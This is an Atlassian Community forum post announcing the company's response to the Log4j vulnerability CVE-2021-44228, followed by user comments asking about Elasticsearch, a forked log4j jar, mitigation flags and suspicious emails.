Create
cancel
Showing results for 
Search instead for 
Did you mean: 
Sign up Log in
It's not the same without you

Join the community to find out what other Atlassian users are discussing, debating and creating.

Atlassian Community Hero Image Collage

Atlassian's Response to Log4j (CVE-2021-44228)

On December 9, Atlassian became aware of the vulnerability CVE-2021-44228 - Log4j.

Impact on Cloud Products

This vulnerability has been mitigated for all Atlassian cloud products previously using vulnerable versions of Log4j. To date, our analysis has not identified compromise of Atlassian systems or customer data prior to the patching of these systems. Atlassian customers are not vulnerable, and no action is required.

Impact on On-Premises Products

No Atlassian on-premises products are vulnerable to CVE-2021-44228.

Some on-premises products use an Atlassian-maintained fork of Log4j 1.2.17, which is not vulnerable to CVE-2021-44228. We have done additional analysis on this fork and confirmed a new but similar vulnerability that can only be exploited by a trusted party. For that reason, Atlassian rates the severity level for on-premises products as low.

 

For further detailed information, please visit;

https://confluence.atlassian.com/display/SECURITY/Multiple+Products+Security+Advisory+-+Log4j+Vulnerable+To+Remote+Code+Execution+-+CVE-2021-44228

https://confluence.atlassian.com/kb/faq-for-cve-2021-44228-1103069406.html

16 comments

Dave Liao Community Leader Dec 13, 2021

Thank you for sharing this!

Like Jodie Vlassis likes this
Like Jodie Vlassis likes this

What about the elasticsearch recommended by atlassian for bitbucket datacenter (ElasticSearch 6.8.6)?

Like # people like this

@license management we will have an update soon on this. 

Hi @Jodie Vlassis 

Our on-prem instance contains this JAR: 
log4j2-stacktrace-origins-2.2-atlassian-2.jar

 

This other thread has some findings/questions from other community users as well.
https://community.atlassian.com/t5/Jira-Core-Server-questions/Is-log4j2-stacktrace-origins-2-2-atlassian-2-jar-vulnerable-to/qaq-p/1884806

 

Based on their findings, this log4j2-stacktrace-origins-2.2-atlassian-2.jar appears to be a fork of log4j2. Is it therefore vulnerable?

Please confirm, thanks!

Like # people like this
Ollie Guan Community Leader Dec 14, 2021

Hi @Jodie Vlassis ,

Thank you for your notice. However, not all users follow the posts in the community in real time.

As a user, is there any way to subscribe to these latest notifications from Atlassian Support's Security?

Hi @Ollie Guan 

 

You can track all things products and incidents via Atlassian Statuspage - https://status.atlassian.com/

Ollie Guan Community Leader Dec 14, 2021

Hi @Jodie Vlassis ,

Thanks for your quick response ^_^.These seem to be services for the cloud. Is there an entrance to the data center?

"We have done additional analysis on this fork and confirmed a new but similar vulnerability that can only be exploited by a trusted party". 

Is it possible to have more informations about this vulnerabilty ? In this case, what's a trusted party ? 

thanks

Like Ruben Nuredini likes this

@julien roynette 

There are indeed 3 vectors. the ldap query that you currently can spot everywhere in the wild. The two others seem to be DNS and RMI. More info here:

https://www.sentinelone.com/blog/cve-2021-44228-staying-secure-apache-log4j-vulnerability/

and 

https://www.picussecurity.com/resource/blog/simulating-and-preventing-cve-2021-44228-apache-log4j-rce-exploits

As for elasticsearch 6.8.6, i can confirm they are vulnerable to the attack, but it can be mitigated by simply adding a "-Dlog4j2.formatMsgNoLookups=true" flag to its java env until a better solution is provided.

 

Kind regards

 

Jonas Andersson

Like # people like this

Hi Does this also cover trello?

@Jodie Vlassis the updated advisory does not explicitly state whether log4j2-stacktrace-origins-2.2-atlassian-2.jar is covered by the vulnerability or not. Can we please get an explicit statement for this module?

Like # people like this

If the cloud products not vulnerable how do they explain these jndi ldap emails that someone sent from our JIRA cloud admin page to our entire company.

That the email headers say originated from Atlassian themselves (dmarc pass, spf pass, etc) apparently from our company jira portal instance that is hosted.  I reported this in a ticket nearly a day ago they didn't respond.

hacktheworld.png

My organization is mandating a minimum version of log4j, currently 2.17.1.  Even if the log4j vulnerability is handled in the Atlassian-forked 1.2.17 version, it is still 1.2.17 -- the official 1.2.17 is very old and out of support and has other concerns, so this continues to be identified as a problem.  Are there any plans to update versioning for this Atlassian-forked variant?

Like # people like this

Comment

Log in or Sign up to comment
TAGS

Community Events

Connect with like-minded Atlassian users at free events near you!

Find an event

Connect with like-minded Atlassian users at free events near you!

Unfortunately there are no Community Events near you at the moment.

Host an event

You're one step closer to meeting fellow Atlassian users at your local event. Learn more about Community Events

Events near you